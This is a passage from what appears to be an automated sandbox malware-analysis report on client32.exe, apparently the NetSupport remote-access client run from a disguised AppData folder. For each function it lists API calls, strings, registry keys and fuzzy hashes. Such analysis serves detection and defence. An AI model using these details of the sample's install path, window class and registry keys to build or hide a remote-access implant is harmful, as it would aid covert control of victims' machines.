                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %s%s%s.bin$878411$_HF$_HW$_SW
                                                                                • API String ID: 2111968516-3519358435
                                                                                • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                • RegisterClassA.USER32(?), ref: 111036EF
                                                                                • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                • String ID: NSMDesktopWnd
                                                                                • API String ID: 2669163067-206650970
                                                                                • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                • API String ID: 47109696-3245241687
                                                                                • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                • API String ID: 806825551-1858614750
                                                                                • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                • ResetEvent.KERNEL32(0000025C), ref: 11144E39
                                                                                • SetEvent.KERNEL32(0000025C), ref: 11144E4F
                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                • String ID: MiniDump
                                                                                • API String ID: 1494854734-2840755058
                                                                                • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                                • wsprintfA.USER32 ref: 11147A16
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                • API String ID: 1985783259-2296142801
                                                                                • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • _memset.LIBCMT ref: 11110207
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                • API String ID: 3234921582-2664294811
                                                                                • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                                • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                • API String ID: 1108920153-1959555903
                                                                                • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                                • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                                Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 11031FE6
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                • String ID: %s%s.bin$878411$clientinv.cpp$m_pDoInv == NULL
                                                                                • API String ID: 4180936305-973242369
                                                                                • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                • _free.LIBCMT ref: 111452AC
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
